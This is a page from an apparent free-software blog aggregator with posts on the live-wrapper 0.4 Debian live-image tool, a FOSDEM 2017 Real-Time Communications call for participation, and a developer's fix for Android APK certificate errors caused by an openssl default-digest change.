Last week saw the quiet upload of live-wrapper 0.4 to unstable. I would have blogged at the time, but there is another announcement coming later in this blog post that I wanted to make at the same time.

live-wrapper is a wrapper around vmdebootstrap for producing bootable live images using Debian GNU/Linux. Accompanied by the live-tasks package in Debian, this provides the toolchain and configuration necessary for building live images using Cinnamon, GNOME, KDE, LXDE, MATE and XFCE. There is also work ongoing to add a GNUstep image to this.

Building a live image with live-wrapper is easy:

sudo apt install live-wrapper
sudo lwr

This will build you a file named output.iso in the current directory containing a minimal live-image. You can the test this in QEMU:

qemu-system-x86_64 -m 2G -cdrom live.iso

You can find the latest documentation for live-wrapper here and any feedback you have is appreciated. So far it looks that booting from CD and USB with both ISOLINUX (BIOS) and GRUB (EFI) are all working as expected on real hardware.

The second announcement that I wanted to accompany this announcement is that we will be running a vmdebootstrap sprint where we will be working on live-wrapper at the MiniDebConf in Cambridge. I will be working on installer integration while Ana Custura will be investigating bootloaders and their customisation. I’d like to thank the Debian Project and those who have given donations to it for supporting our travel and accomodation costs for this sprint.

Wednesday, 26 October 2016

FOSDEM 2017 Real-Time Communications Call for Participation

DanielPocock.com - fsfe | 06:39, Wednesday, 26 October 2016

FOSDEM is one of the world's premier meetings of free software developers, with over five thousand people attending each year. FOSDEM 2017 takes place 4-5 February 2017 in Brussels, Belgium.

This email contains information about:

  • Real-Time communications dev-room and lounge,
  • speaking opportunities,
  • volunteering in the dev-room and lounge,
  • related events around FOSDEM, including the XMPP summit,
  • social events (the legendary FOSDEM Beer Night and Saturday night dinners provide endless networking opportunities),
  • the Planet aggregation sites for RTC blogs

Call for participation - Real Time Communications (RTC)

The Real-Time dev-room and Real-Time lounge is about all things involving real-time communication, including: XMPP, SIP, WebRTC, telephony, mobile VoIP, codecs, peer-to-peer, privacy and encryption. The dev-room is a successor to the previous XMPP and telephony dev-rooms. We are looking for speakers for the dev-room and volunteers and participants for the tables in the Real-Time lounge.

The dev-room is only on Saturday, 4 February 2017. The lounge will be present for both days.

To discuss the dev-room and lounge, please join the FSFE-sponsored Free RTC mailing list.

To be kept aware of major developments in Free RTC, without being on the discussion list, please join the Free-RTC Announce list.

Speaking opportunities

Note: if you used FOSDEM Pentabarf before, please use the same account/username

Real-Time Communications dev-room: deadline 23:59 UTC on 17 November. Please use the Pentabarf system to submit a talk proposal for the dev-room. On the "General" tab, please look for the "Track" option and choose "Real-Time devroom". Link to talk submission.

Other dev-rooms and lightning talks: some speakers may find their topic is in the scope of more than one dev-room. It is encouraged to apply to more than one dev-room and also consider proposing a lightning talk, but please be kind enough to tell us if you do this by filling out the notes in the form.

You can find the full list of dev-rooms on this page and apply for a lightning talk at https://fosdem.org/submit

Main track: the deadline for main track presentations is 23:59 UTC 31 October. Leading developers in the Real-Time Communications field are encouraged to consider submitting a presentation to the main track.

First-time speaking?

FOSDEM dev-rooms are a welcoming environment for people who have never given a talk before. Please feel free to contact the dev-room administrators personally if you would like to ask any questions about it.

Submission guidelines

The Pentabarf system will ask for many of the essential details. Please remember to re-use your account from previous years if you have one.

In the "Submission notes", please tell us about:

  • the purpose of your talk
  • any other talk applications (dev-rooms, lightning talks, main track)
  • availability constraints and special needs

You can use HTML and links in your bio, abstract and description.

If you maintain a blog, please consider providing us with the URL of a feed with posts tagged for your RTC-related work.

We will be looking for relevance to the conference and dev-room themes, presentations aimed at developers of free and open source software about RTC-related topics.

Please feel free to suggest a duration between 20 minutes and 55 minutes but note that the final decision on talk durations will be made by the dev-room administrators. As the two previous dev-rooms have been combined into one, we may decide to give shorter slots than in previous years so that more speakers can participate.

Please note FOSDEM aims to record and live-stream all talks. The CC-BY license is used.

Volunteers needed

To make the dev-room and lounge run successfully, we are looking for volunteers:

  • FOSDEM provides video recording equipment and live streaming, volunteers are needed to assist in this
  • organizing one or more restaurant bookings (dependending upon number of participants) for the evening of Saturday, 4 February
  • participation in the Real-Time lounge
  • helping attract sponsorship funds for the dev-room to pay for the Saturday night dinner and any other expenses
  • circulating this Call for Participation (text version) to other mailing lists

See the mailing list discussion for more details about volunteering.

Related events - XMPP and RTC summits

The XMPP Standards Foundation (XSF) has traditionally held a summit in the days before FOSDEM. There is discussion about a similar summit taking place on 2 and 3 February 2017. XMPP Summit web site - please join the mailing list for details.

We are also considering a more general RTC or telephony summit, potentially in collaboration with the XMPP summit. Please join the Free-RTC mailing list and send an email if you would be interested in participating, sponsoring or hosting such an event.

Social events and dinners

The traditional FOSDEM beer night occurs on Friday, 3 February.

On Saturday night, there are usually dinners associated with each of the dev-rooms. Most restaurants in Brussels are not so large so these dinners have space constraints and reservations are essential. Please subscribe to the Free-RTC mailing list for further details about the Saturday night dinner options and how you can register for a seat.

Spread the word and discuss

If you know of any mailing lists where this CfP would be relevant, please forward this email (text version). If this dev-room excites you, please blog or microblog about it, especially if you are submitting a talk.

If you regularly blog about RTC topics, please send details about your blog to the planet site administrators:

Planet site Admin contact
All projects Free-RTC Planet (http://planet.freertc.org) contact [email protected]
XMPP Planet Jabber (http://planet.jabber.org) contact [email protected]
SIP Planet SIP (http://planet.sip5060.net) contact [email protected]
SIP (Español) Planet SIP-es (http://planet.sip5060.net/es/) contact [email protected]

Please also link to the Planet sites from your own blog or web site as this helps everybody in the free real-time communications community.

Contact

For any private queries, contact us directly using the address [email protected] and for any other queries please ask on the Free-RTC mailing list.

The dev-room administration team:

Tuesday, 25 October 2016

Robot Repair

David Boddie - Updates (Full Articles) | 22:41, Tuesday, 25 October 2016

A while ago I suspended my exploration of Android development, having reevaluated my priorities and taken a step back from a period of fairly intensive work on tools. Back in June, I wrote a brief overview of the status of my compiler tools then didn't really look at them until this week. The first thing I needed to do was to figure out why I could no longer build packages for my phone.

Running to Stand Still

To get myself familiar with the build process again, I decided to rebuild a simple prototype for a game that I had been working on. Everything seemed to go as planned – the tools didn't complain about anything, so I hadn't left the code in a non-working state. However, when I used adb to upload the package to the phone, the package manager rejected it with a terse and unhelpful response, which adb helpfully relayed back to the console:

Failure [INSTALL_PARSE_FAILED_NO_CERTIFICATES]

If you search the Web for this error, you will quickly discover that it seems to be one of its favourite catchphrases, covering all sorts of problems it finds with packages. Unfortunately, this makes finding useful advice about it to be very difficult — the Android site doesn't seem to include anything useful about errors delivered via adb, probably because the average developer is supposed to be using Android Studio, not “messing about” at the command line. Having spent a few years working on API documentation and manuals for developers, I imagine that someone thought that information about command line tools would somehow take something away from the beautiful learning journey they had planned for new developers, so decided not to make that a priority. Perhaps my cynicism is uncalled for. In any case, trawling the Web for answers led to the usual sites where I found desperate programmers wailing and thrashing around while onlookers suggested things like cleaning their project and reading the documentation. How helpful!

To cut a long story short, a site I'd visited earlier provided a way to help diagnose the problem. Unpacking packages I'd built before the summer – using unzip because APK files are just ZIP files – and packages I had just built this week, I was then able to inspect their certificates with the following command:

openssl asn1parse -i -inform DER -in META-INF/CERT.RSA

It turned out that when signing my packages, openssl was including a field that claimed the digest used was sha1 but was using sha256 to create the digest. This was not happening in June, and it turns out that an update to the Debian openssl package in September (version 1.0.1t-1) included a change to the default message digest algorithm used. I “fixed” my problem by ensuring that my new signing certificate is created using the same digest algorithm that I use when signing packages. Still, not everything worked straight away – installing my newly created package on the phone failed with this complaint:

Failure [INSTALL_PARSE_FAILED_INCONSISTENT_CERTIFICATES]

However, searching for this error proved much more fruitful and enlightening than for the previous one, and the solution – uninstall the old version of the application – was simple and quick.

Rebooting the Robot?

It would probably be good to document a few things I did earlier in the year, though I'm even less inclined to stare at Android documentation than I was before. It would be useful to be able to make the occasional small application for my own purposes and I'm quite accustomed to the peculiarities of my own toolchain, though others might find it a little strange to get used to.

Categories: Free Software, Android

Planet Fellowship (en): RSS 2.0 | Atom | FOAF |

  /127.0.0.?  /var/log/fsfe/flx » planet-en  Albrechts Blog  Alessandro at FSFE » English  Alessandro's blog  Alina Mierlus - Building the Freedom » English  André on Free Software » English  Being Fellow #952 of FSFE » English  Bela's Internship Blog  Bernhard's Blog  Bits from the Basement  Blog of Martin Husovec  Blog » English  Blog – Think. Innovation.  Bobulate  Brian Gough's Notes  Carlo Piana :: Law is Freedom ::  Ciarán's free software notes  Colors of Noise - Entries tagged planetfsfe  Communicating freely  Computer Floss  Daniel Martí's blog  Daniel's FSFE blog  DanielPocock.com - fsfe  David Boddie - Updates (Full Articles)  Don't Panic » English Planet  ENOWITTYNAME  Elena ``of Valhalla''  English Planet – Dreierlei  English – Björn Schießle's Weblog  English – Max's weblog  English — mina86.com  Escape to freedom  FLOSS – Creative Destruction & Me  FSFE Fellowship Vienna » English  FSFE interviews its Fellows  Fellowship News  Florian Snows Blog » en  Frederik Gladhorn (fregl) » FSFE  Free Software & Digital Rights Noosphere  Free Software with a Female touch  Free Software –  Free Software – GLOG  Free Software – hesa's Weblog  Free as LIBRE  Free speech is better than free beer » English  Free, Easy and Others  From Out There  Graeme's notes » Page not found  Green Eggs and Ham  Handhelds, Linux and Heroes  Heiki "Repentinus" Ojasild » English  HennR's FSFE blog  Henri Bergius  Hook’s Humble Homepage  Hugo - FSFE planet  Iain R. Learmonth  Inductive Bias  Jelle Hermsen » English  Jens Lechtenbörger » English  Karsten on Free Software  Losca  Marcus's Blog  Mario Fux  Mark P. Lindhout’s Flamepit  Martin's notes - English  Matej's blog » FSFE  Matthias Kirschner's Web log - fsfe  Myriam's blog  Mäh?  Nice blog  Nico Rikken » fsfe  Nicolas Jean's FSFE blog » English  Norbert Tretkowski  PB's blog » en  Paul Boddie's Free Software-related blog » English  Pressreview  Rekado  Riccardo (ruphy) Iaconelli - blog  Saint's Log  Seravo  Tarin Gamberini  Technology – Intuitionistically Uncertain  The Girl Who Wasn't There » English  The trunk  Thib's Fellowship Blog » fsfe  Thinking out loud » English  Thomas Koch - free software  Thomas Løcke Being Incoherent  Told to blog - Entries tagged fsfe  Tonnerre Lombard  Torsten's FSFE blog » english  Viktor's notes » English  Vitaly Repin. Software engineer's blog  Weblog  Weblog  Weblog  Weblog  Weblog  Weblog  Werner's own blurbs  With/in the FSFE » English  a fellowship ahead  agger's Free Software blog  anna.morris's blog  ayers's blog  bb's blog  blog  drdanzs blog » freesoftware  egnun's blog » FreeSoftware  emergency exit  free software - Bits of Freedom  free software blog  freedom bits  gollo's blog » English  julia.e.klein's blog  marc0s on Free Software  mkesper's blog » English  nikos.roussos - opensource  pichel's blog  polina's blog  rieper|blog » en  softmetz' anglophone Free Software blog  stargrave's blog  the_unconventional's blog » English  things i made  tobias_platen's blog  tolld's blog  vanitasvitae's blog » englisch  wkossen's blog  yahuxo's blog